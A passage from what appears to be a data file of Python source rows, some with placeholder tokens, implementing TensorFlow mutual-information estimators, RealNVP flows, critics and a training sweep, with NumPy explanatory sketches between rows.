Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\nif RUN_EXPERIMENTS:\n data_invertible = run_all_experiments()['df']\n data_invertible.to_pickle(RESULT_DIR)\nelse:\n os.system(\n 'wget -q -N https://storage.googleapis.com/mi_for_rl_files/mi_results.pkl'\n )\n data_invertible = pd.read_pickle('mi_results.pkl')\n data_invertible = data_invertible[data_invertible.exp_name == 'invertible']\n",
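# A minimal NumPy sketch of the label-smoothed PCC objective (label_smooth_pcc) defined
# in the rows above: the critic matrix is flattened, the targets are the smoothed identity
# matrix (1 for joint pairs on the diagonal, 0 for product-of-marginals pairs), and the
# returned value is the negative binary cross-entropy, which the training loop negates
# again to obtain the loss. The toy inputs and the name `label_smooth_pcc_np` are
# illustrative assumptions.
import numpy as np

def label_smooth_pcc_np(scores, smoothing=0.01):
    n = scores.shape[0]
    labels = np.eye(n).reshape(-1)                         # 1 on the diagonal, 0 elsewhere
    labels = (1.0 - smoothing) * labels + smoothing / 2.0  # label smoothing
    probs = 1.0 / (1.0 + np.exp(-scores.reshape(-1)))      # sigmoid of the critic outputs
    eps = 1e-7                                             # numerical guard for log(0)
    bce = -np.mean(labels * np.log(probs + eps)
                   + (1.0 - labels) * np.log(1.0 - probs + eps))
    return -bce

rng = np.random.default_rng(1)
toy_scores = rng.normal(size=(100, 100)) + 4.0 * np.eye(100)
print(label_smooth_pcc_np(toy_scores, smoothing=0.01))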
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\ndef nwj_lower_bound(scores):\n return tuba_lower_bound(scores - 1.0)\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. 
(2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\[email protected]\ndef adap_pred_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n pre_prob = (1.0 - alpha) * pre_prob + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n 
return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\ndef load_data(split):\n return tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split\n ).cache().map(map_func=map_fn).shuffle(1000)\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n\n\ndef processed_train_data(dims, batch_size):\n dataset = load_data('train')\n dataset_batched = dataset.repeat().batch(batch_size, drop_remainder=True)\n get_next = tf.compat.v1.data.make_one_shot_iterator(dataset_batched\n ).get_next()\n features = get_next[FEATURE_INPUT]\n labels = get_next[FEATURE_LABEL]\n x_1, x_2 = tf.split(features, [dims, DIMS - dims], axis=-1)\n return x_1, x_2, labels\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if 
bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = 
[np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. 
By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! 
Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\n<code token>\n",
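# A minimal NumPy sketch of one RealNVP affine coupling step, the building block of the
# RealNVP / RealNVPBijector classes in the rows above: the first num_masked coordinates
# pass through unchanged and parameterize a shift and scale applied to the remaining
# coordinates. This sketch uses the common exp(log_scale) parameterization; the original
# code instead feeds a softplus-based scale into AffineScalar. The toy linear conditioner
# `fn` is an illustrative assumption.
import numpy as np

def coupling_forward(x, num_masked, shift_and_log_scale_fn):
    x0, x1 = x[..., :num_masked], x[..., num_masked:]
    shift, log_scale = shift_and_log_scale_fn(x0, x1.shape[-1])
    y1 = x1 * np.exp(log_scale) + shift              # affine transform of the free half
    return np.concatenate([x0, y1], axis=-1)         # masked half is copied through

def coupling_inverse(y, num_masked, shift_and_log_scale_fn):
    y0, y1 = y[..., :num_masked], y[..., num_masked:]
    shift, log_scale = shift_and_log_scale_fn(y0, y1.shape[-1])
    x1 = (y1 - shift) * np.exp(-log_scale)           # exact inverse of the forward pass
    return np.concatenate([y0, x1], axis=-1)

rng = np.random.default_rng(2)
W = rng.normal(scale=0.1, size=(4, 8))               # toy conditioner: a single linear map
fn = lambda x0, d: np.split(x0 @ W, 2, axis=-1)      # returns (shift, log_scale), width d each
x = rng.normal(size=(5, 8))
y = coupling_forward(x, 4, fn)
assert np.allclose(coupling_inverse(y, 4, fn), x)    # invertibility sanity check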
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\ndef 